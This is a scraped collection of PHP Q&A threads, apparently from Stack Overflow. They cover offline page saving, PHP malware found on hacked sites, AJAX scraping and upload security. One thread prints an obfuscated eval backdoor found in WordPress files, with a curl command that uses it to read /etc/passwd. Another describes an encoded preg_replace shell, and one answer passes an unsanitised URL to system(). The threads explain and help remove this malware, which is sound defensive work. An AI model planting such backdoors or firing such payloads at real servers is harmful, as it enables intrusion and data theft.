PHP: read html file for offline reading

PHP: read html file for offline reading - php

I am using file_get_contents() function to read a URL eg:
$html = file_get_contents('www.mydomain.com');
Now how do I modify above code or what should I do to read pages offline once saved in my db. The problem is that saved pages have images and css pointing to fetched url which means internet should be on to read them.
How can I make it have images as well as CSS also saved. I had asked similar question before regarding mht/mhtml format.

Is that what you're looking for?
http://www.phpclasses.org/package/1766-PHP-Build-MHT-MIME-archives-from-lists-of-files.html
http://www.wynia.org/wordpress/2006/12/making-mht-single-page-archive-files-with-php
Please note that MHT is MS-specific format so above example uses Windows libraries.

One way to do this that is potentially dangerous (you'll have to sanitize inputs, if any), but will certainly work if your server is a well-equipped Linux server, is to invoke the wget program with the right arguments using PHP's system function, like so:
system("wget --recursive --no-clobber --page-requisites \
--html-extension --convert-links --no-parent $url");
Once the files are downloaded, you can put them in the database, though I have to ask: what benefits does a database have over a file system for the purpose of storing files? Of course, I don't know your particular circumstances; I'm just raising the question in case you're making things more complicated than they need to be.

Related

Suspicious code found in my WordPress site - How to fix?

One of my site was hacked last night and some porno content was placed on my site.
What I have done:
I have removed manually the adult content from site by using FTP.
My website is up now and working fine. But, still I am able to find some code in my plugin and theme files. Which was not written by me, Code is as below:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
?>
What my queries are:
What this code stands for, what is this doing?
Is this harmful?
Should I remove this code from my files?
Is this will make any effect on my site if removed?
Other Code Suggestions Required:
This sort of code is available in 100+ files. Is there any method to remove code from all files in once? Or any method to keep code and just make it disinfect? so, it will save my time to remove code manually from too much files.

What this code stands for, what is this doing?
This code is a backdoor which can be used by an attacker to execute arbitrary code. This is what the code intends to do.
<?php
eval( base64_decode( $_POST['n842e1c'] ) );
An attacker can make a post request to this file with his encoded payload in POST parameter n842e1c and execute PHP code.
Example:
curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE
Here this ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs= is the BASE64 encoded string of echo readfile('/etc/passwd');.
Is this harmful?
Yes
Should I remove this code from my files?
Yes
Will this make any effect on my site if removed?
No
Here are some tips to help you clean the website. Also, follow this official post by wordpress to take necessary steps.

It's a backdoor, taking a POST parameter named n842e1c and execute it. Instruction is encoded as Base64.
It is.
You should immediately.
Nothing, remove it asap.
Maybe re-install wordpress, or you could quickly develop a script in python (or something else) to remove this string from your files.

PHP eval is dangerous.
It basically executes the code within it's function. So you must remove it if you are not sure of it's use in your website.
The eval() language construct is very dangerous because it allows
execution of arbitrary PHP code. Its use thus is discouraged. If you
have carefully verified that there is no other option than to use this
construct, pay special attention not to pass any user provided data
into it without properly validating it beforehand.
Source
You can not disable it directly so the only choice is you remove the code from all the files.

Try installing these free plugins on your Website.
Sucuri WordPress Auditing and Theme Authenticity Checker (TAC).
Follow below URLs to get some help.
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/

cURL PHP - load a fully page

I am currently trying to load an HTML page via cURL. I can retrieve the HTML content, but part is loaded later via scripting (AJAX POST). I can not recover the HTML part (this is a table).
Is it possible to load a page entirely?
Thank you for your answers

No, you cannot do this.
CURL does nothing more than download a file from a URL -- it doesn't care whether it's HTML, Javascript, and image, a spreadsheet, or any other arbitrary data; it just downloads. It doesn't run anything or parse anything or display anything, it just downloads.
You are asking for something more than that. You need to download, parse the result as HTML, then run some Javascript that downloads something else, then run more Javascript that parses that result into more HTML and inserts it into the original HTML.
What you're basically looking for is a full-blown web browser, not CURL.
Since your goal involves "running some Javascript code", it should be fairly clear that it is not acheivable without having a Javascript interpreter available. This means that it is obviously not going to work inside of a PHP program (*). You're going to need to move beyond PHP. You're going to need a browser.
The solution I'd suggest is to use a very specialised browser called PhantomJS. This is actually a full Webkit browser, but without a user interface. It's specifically designed for automated testing of websites and other similar tasks. Your requirement fits it pretty well: write a script to get PhantomJS to open your URL, wait for the table to finish rendering, and grab the finished HTML code.
You'll need to install PhantomJS on your server, and then use a library like this one to control it from your PHP code.
I hope that helps.
(*) yes, I'm aware of the PHP extension that provides a JS interpreter inside of PHP, and it would provide a way to solve the problem, but it's experimental, unfinished, would be still difficult to implement as a solution, and I don't think it's a particularly good idea anyway, so let's not consider it for the purposes of this answer.

No, the only way you can do that is if you make a separate curl request to ajax request and put the two results together afterwards.

Virus file systems.php on my server?

I found a file systems.php on my webserver that neither I - as user - placed there, nor my webserver provider has placed in there. I viewed the file, it only contains one preg_replace() statement with an extremly long $replacement part, which seems to be somehow encoded.
preg_replace("/.*/e","\x28\x65\...\x29\x29\x3B",".");
If I interpret this statement correctly, it would mean that basically everything shall be replaced be the $replacement part (which might be encrypted/encoded virus injection stuff).
I have uploaded the whole code as pastebin here. Someone has an idea in what way the code is encrypted/how it can be decrypted in order to assess the grade of compromisation of my server?
Update
This might be the attack vector:
So after some digging, we found that this script was planted using a vulnerability in the Uploadify jQuery library. The library's existence was discovered by the attacker through google. source

Unhexxing the shellcode shows it's executing eval(gzinflate(base64_decode(huge string));
I changed this eval to an echo and the full output is on pastebin here:
http://pastebin.com/t1iZ5LQ8
I haven't looked much further into this but it certainly seems dodgy. Just thought I'd do some of the legwork for anyone interested in looking at it further
EDIT
Little bit more detailed look, it appears to allow an attacker to upload files to your server, and take a dump of any databases on the box

It's look like a Shellcode, which can be disastrous for your server, shellcode executed by the CPU can give access to a shell or shuch of things.
For more informations about shellcodes here's a good article :
http://www.vividmachines.com/shellcode/shellcode.html
This upload may hide a possible exploit on your server which grant access to upload or write data into, try to check your logs to identify the problem.

page has two php files with identical names how to wget the correct php file? adding identifier?

I have this problem when I'm trying to use wget to retrieve the OUTPUT of a specific php script, but it looks like this site generates 2 identical PHP files.
The 1st one is smaller and the 2nd one, in the sequence, is the correct one. The problem is every time I try the wget command, I end-up with the smallest output file, which does not contain the desired info :(
Is there a way to download the correct file, using wget, by adding some sort of identifier to the link, to make sure I'm downloading the correct file.
Here is the command I've been trying:
$ wget http://www.fernsehen.to/index.php
If your run/play this and use Fidller or Wireshark for capture, you'll end-up with two (2) "http://www.fernsehen.to/index.php" and I need the bigger file of the two.
P.S. To manually get the desired output file, you can open http://www.fernsehen.to/index.php in Firefox or chrome and view source.
Thank you in advance!

What you want is not really practically possible. When you visit that page, they first generate a small file with a load of Javascript, that detects browser features and sends them back to the server in a stateful manner in order to produce the exact code required for your browser, probably including stuff like supported codecs for video mainly. Probably they also do some session fingerprinting for DRM purposes, to stop people like you from exactly what you're trying to do.
wget cannot emulate this behaviour because it is not a full browser, and cannot execute all that Javascript, nor if it did properly supply browser-like data. You'd have to write an extensive piece of custom code that exactly mimics everything the in-between page is doing to achieve the intended effect. Possible, but not easy, and most certainly not with a basic generic-purpose tool like wget.

Is php fileinfo sufficient to prevent upload of malicious files?

I have searched around a bit, and have not really found a professional type response to how to have secure fileupload capability. So I wanted to get the opinion of some of the experts on this site. I am currently allowing upload of mp3s and images, and while I am pretty confident in preventing xss and injection attacks on my site, I am not really familiar with fileupload security. I basically just use php fileinfo and check an array of accepted filetypes against the filetype. For images, there is the getimagesize function and some additional checks. As far as storing them, I just have a folder within my directory, because I want the users to be able to use the files. If anyone could give me some tips I would really appreciate it.

I usually invoke ClamAV when accepting files that can be shared. With PHP, this is rather easily accomplished with php-clamav.
One of the last things you want to do is spread malware around the globe :)
If you can, do this in the background after a file is uploaded, but before making it public. A quirk with this class is that it can load the entire ClamAV virus definition database into memory, which will almost certainly stink if PHP is running under Apache conventionally (think on the order of +120 MB of memory per instance).
Using something like beanstalkd to scan uploads then update your DB to make them public is a very good way to work around this.
I mentioned this only because the other answers had not, in no way did I intend this to be a complete solution. See the other answers posted here, this is a step you should be finishing with. Always, always, always sanitize your input, make sure it's of the expected type, etc (did I mention that you should read the other answers too?)

"malicious" files are not the only way to hurt your server (and if your site is down, it hurts your users).
For example, a possibility to hurt a server would be to upload a lot of very small files :
it would not use all the space on the disk,
but could use all available inodes...
...And when there is no free inode left, it's not possible to create any file anymore ; which, obviously, is bad.
After that, there is also the problems like :
copyright
content that is not OK to you or your users (nudity ? )
For that, there's not much you an do with technical solutions -- but an "alert the moderator" feature is oftne helpful ;-)

No, because this could easily be spoofed. There's an article that describes how a server could be attacked by uploading a 1x1 "jpg file" and how to prevent it. Good read.

The first thing to do would be to disable execution of any server side code (e.g. PHP) in that directory via server configuration. Setting up a whitelist for MIME types (or file extensions, since your server uses those to figure out the mime type in the first place) and only allowing media files (not HTML or anything) will protect you from XSS injections. Those combined with a file type check should be quite sufficient - the only thing I can think of that might get through those are things that exploit image/audio decoders, and for spotting those you'd need something close to a virus scanner.

To start with the "file-type" ($_FILES['userfile']['type']) is completely meaningless. This is a variable in the HTTP post request that can be ANY VALUE the attacker wants. Remove this check ASAP.
getimagesize() Is an excellent way to verify that an image is real. Sounds files can be a bit more tricky, you could call file /tmp/temp_uploaded_file on the commandline.
By far the most important part of an uploaded file is the file's extension. If the file is a .php, then you just got hacked. It gets worse, Apache can be configured to ignore the first file extension if it doesn't recognize it, and then use the next extension, so this file would be executed a normal .php file: backdoor.php.junk. By default this should be disabled, but it was enabled by default a few years ago.
You MUST MUST MUST use a file extension White List. So you want to force using files like: jpg,jpeg,gif,png,mp3 and reject it otherwise.

if exiv2 can't remove the metadata its probably malicious or corrupted in some way atleast. following required exiv2 be installed on your unix system. Unfortunately, this might be dangerous if the file contains malicious shell code. not sure how sturdy exiv2 is against shell exploits, so use with caution. i haven't used it, but i've thought about using it.
function isFileMalicious($file)
{
try{
$out = [];
#exec('exiv2 rm '.escapeshellarg($file).' 2>&1',$out);
if(!empty($out)){
return false;
}
}
catch(exception $e)
{
return false;
}
return true;
}

We Keep Coding

PHP, A popular general-purpose scripting language that is especially suited to web development.